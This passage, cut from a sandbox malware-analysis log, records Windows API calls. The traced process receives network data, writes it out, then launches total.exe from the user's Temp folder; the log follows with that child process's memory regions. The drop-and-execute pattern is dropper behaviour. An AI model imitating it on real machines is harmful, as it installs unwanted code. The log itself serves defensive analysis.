lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x16d0, lpOverlapped=0x0) returned 1 [0141.767] recv (in: s=0x4f8, buf=0x2eee350, len=777, flags=0 | out: buf=0x2eee350*) returned 777 [0141.924] SetEvent (hEvent=0x3d0) returned 1 [0141.924] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x1c78d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d3d8*=0x309, lpOverlapped=0x0) returned 1 [0141.925] CloseHandle (hObject=0x4f4) returned 1 [0141.964] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.964] CoTaskMemFree (pv=0x1b869280) [0141.994] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.994] CoTaskMemFree (pv=0x1b869280) [0142.030] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78cb70, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0142.030] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0142.030] SetErrorMode (uMode=0x1) returned 0x1 [0142.030] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78ce50 | out: lpFileInformation=0x1c78ce50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ed20a30, ftCreationTime.dwHighDateTime=0x1d4406f, ftLastAccessTime.dwLowDateTime=0x5ed20a30, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x5f2a1d10, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0xc9298)) returned 1 [0142.030] SetErrorMode (uMode=0x1) returned 0x1 [0142.031] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78d160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0142.031] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0142.031] SetErrorMode (uMode=0x1) returned 0x1 [0142.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78d3f0 | out: lpFileInformation=0x1c78d3f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ed20a30, ftCreationTime.dwHighDateTime=0x1d4406f, ftLastAccessTime.dwLowDateTime=0x5ed20a30, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x5f2a1d10, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0xc9298)) returned 1 [0142.032] SetErrorMode (uMode=0x1) returned 0x1 [0142.032] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78d0e0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0142.033] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78d160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0142.033] SetErrorMode (uMode=0x1) returned 0x1 [0142.033] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78d370 | out: lpFileInformation=0x1c78d370*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ed20a30, ftCreationTime.dwHighDateTime=0x1d4406f, ftLastAccessTime.dwLowDateTime=0x5ed20a30, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x5f2a1d10, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0xc9298)) returned 1 [0142.033] SetErrorMode (uMode=0x1) returned 0x1 [0142.034] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0142.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.034] CoTaskMemFree (pv=0x1b869280) [0142.035] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0142.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.036] CoTaskMemFree (pv=0x1b869280) [0142.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0x1c78cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0142.039] SetErrorMode (uMode=0x1) returned 0x1 [0142.039] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c78cfc0 | out: lpFileInformation=0x1c78cfc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0142.039] SetErrorMode (uMode=0x1) returned 0x1 [0142.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0x1c78cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0142.040] SetErrorMode (uMode=0x1) returned 0x1 [0142.040] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c78cfc0 | out: lpFileInformation=0x1c78cfc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0142.040] SetErrorMode (uMode=0x1) returned 0x1 [0142.043] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1b83c410 [0142.044] RtlMoveMemory (in: Destination=0x1b83c410, Source=0x2f44c88, Length=0x5e | out: Destination=0x1b83c410) [0142.044] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x1b85cae0 [0142.044] RtlMoveMemory (in: Destination=0x1b85cae0, Source=0x2f4ee88, Length=0x40 | out: Destination=0x1b85cae0) [0142.047] ShellExecuteExW (in: pExecInfo=0x2f4f470*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2f4f470*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x57c)) returned 1 [0142.123] LocalFree (hMem=0x1b83c410) returned 0x0 [0142.123] LocalFree (hMem=0x1b85cae0) returned 0x0 [0142.124] NtQueryInformationProcess (in: ProcessHandle=0x57c, ProcessInformationClass=0x0, ProcessInformation=0x2f4f530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2f4f530, ReturnLength=0x0) returned 0x0 [0142.125] EnumProcesses (in: lpidProcess=0x2f4f578, cb=0x400, lpcbNeeded=0x1c78d820 | out: lpidProcess=0x2f4f578, lpcbNeeded=0x1c78d820) returned 1 [0148.575] SetEvent (hEvent=0x330) returned 1 [0148.575] SetEvent (hEvent=0x304) returned 1 [0148.575] SetEvent (hEvent=0x308) returned 1 [0148.575] SetEvent (hEvent=0x320) returned 1 [0148.575] SetEvent (hEvent=0x340) returned 1 [0148.575] SetEvent (hEvent=0x334) returned 1 [0148.575] SetEvent (hEvent=0x338) returned 1 [0148.575] SetEvent (hEvent=0x33c) returned 1 [0148.575] SetEvent (hEvent=0x344) returned 1 [0148.576] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1c78ef18*=0x39c, lpdwindex=0x1c78ec30 | out: lpdwindex=0x1c78ec30) returned 0x0 [0149.861] VirtualQuery (in: lpAddress=0x1c78db30, lpBuffer=0x1c78e9f0, dwLength=0x30 | out: lpBuffer=0x1c78e9f0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0149.862] VirtualQuery (in: lpAddress=0x1c78dde0, lpBuffer=0x1c78eca0, dwLength=0x30 | out: lpBuffer=0x1c78eca0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0149.869] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1c78e3e0*=0x570, lpdwindex=0x1c78e110 | out: lpdwindex=0x1c78e110) returned 0x0 [0149.869] SetEvent (hEvent=0x52c) returned 1 [0149.869] SetEvent (hEvent=0x570) returned 1 [0149.869] SetEvent (hEvent=0x580) returned 1 [0149.869] SetEvent (hEvent=0x52c) returned 1 [0149.869] SetEvent (hEvent=0x570) returned 1 [0149.869] SetEvent (hEvent=0x590) returned 1 [0149.869] SetEvent (hEvent=0x584) returned 1 [0149.869] SetEvent (hEvent=0x588) returned 1 [0149.869] SetEvent (hEvent=0x58c) returned 1 [0149.870] SetEvent (hEvent=0x594) returned 1 [0149.870] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1c78ef18*=0x39c, lpdwindex=0x1c78ec30 | out: lpdwindex=0x1c78ec30) returned 0x0 [0151.837] CoGetContextToken (in: pToken=0x1c78f8b0 | out: pToken=0x1c78f8b0) returned 0x0 [0151.841] CoUninitialize () Thread: id = 50 os_tid = 0x820 Thread: id = 51 os_tid = 0x81c Thread: id = 52 os_tid = 0x5c8 Thread: id = 53 os_tid = 0x68c [0140.871] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0140.875] ResetEvent (hEvent=0x3d0) returned 1 Process: id = "4" image_name = "total.exe" filename = "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" page_root = "0x4cd00000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xbf8" cmd_line = "\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" " cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 891 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 892 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 893 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 894 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 895 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 896 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 897 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 898 start_va = 0x400000 end_va = 0x439fff entry_point = 0x400000 region_type = mapped_file name = "total.exe" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") Region: id = 899 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 900 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 901 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 902 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 903 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 904 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 905 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 906 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 907 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 908 start_va = 0x200000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 909 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 910 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 911 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 912 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 913 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 914 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 915 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 916 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 918 start_va = 0x440000 end_va = 0x4a6fff entry_point = 0x440000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 919 start_va = 0x75140000 end_va = 0x751c3fff entry_point = 0x75140000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 920 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 921 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 922 start_va = 0x75920000 end_va = 0x75976fff entry_point = 0x75920000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 923 start_va = 0x75a60000 end_va = 0x75bbbfff entry_point = 0x75a60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 924 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 925 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 926 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 927 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 928 start_va = 0x76880000 end_va = 0x774c9fff entry_point = 0x76880000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 929 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 930 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 931 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 932 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 933 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 934 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 935 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 936 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 937 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 938 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 939 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 940 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 941 start_va = 0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 942 start_va = 0x7f0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 943 start_va = 0x1c70000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 944 start_va = 0x75540000 end_va = 0x755bffff entry_point = 0x75540000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 945 start_va = 0x1c80000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 946 start_va = 0x75120000 end_va = 0x75136fff entry_point = 0x75120000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 947 start_va = 0x75680000 end_va = 0x7568afff entry_point = 0x75680000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 948 start_va = 0x76130000 end_va = 0x762ccfff entry_point = 0x76130000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 949 start_va = 0x76020000 end_va = 0x76046fff entry_point = 0x76020000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 950 start_va = 0x77810000 end_va = 0x7789efff entry_point = 0x77810000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 951 start_va = 0x75c70000 end_va = 0x75c81fff entry_point = 0x75c70000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 952 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 953 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 954 start_va = 0x1dd0000 end_va = 0x21c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 955 start_va = 0x750d0000 end_va = 0x7511bfff entry_point = 0x750d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 956 start_va = 0x74fd0000 end_va = 0x750c4fff entry_point = 0x74fd0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 957 start_va = 0x75520000 end_va = 0x75532fff entry_point = 0x75520000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 958 start_va = 0x74f90000 end_va = 0x74fcbfff entry_point = 0x74f90000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 959 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x1d0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 960 start_va = 0x77570000 end_va = 0x775f2fff entry_point = 0x77570000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 961 start_va = 0x75760000 end_va = 0x75768fff entry_point = 0x75760000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 962 start_va = 0x75750000 end_va = 0x75754fff entry_point = 0x75750000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 963 start_va = 0x1c80000 end_va = 0x1d5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 964 start_va = 0x1d90000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 965 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 966 start_va = 0x21d0000 end_va = 0x249efff entry_point = 0x21d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 967 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 968 start_va = 0x75320000 end_va = 0x754bdfff entry_point = 0x75320000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 969 start_va = 0x280000 end_va = 0x280fff entry_point = 0x280000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 970 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 971 start_va = 0x1bf0000 end_va = 0x1c2ffff entry_point = 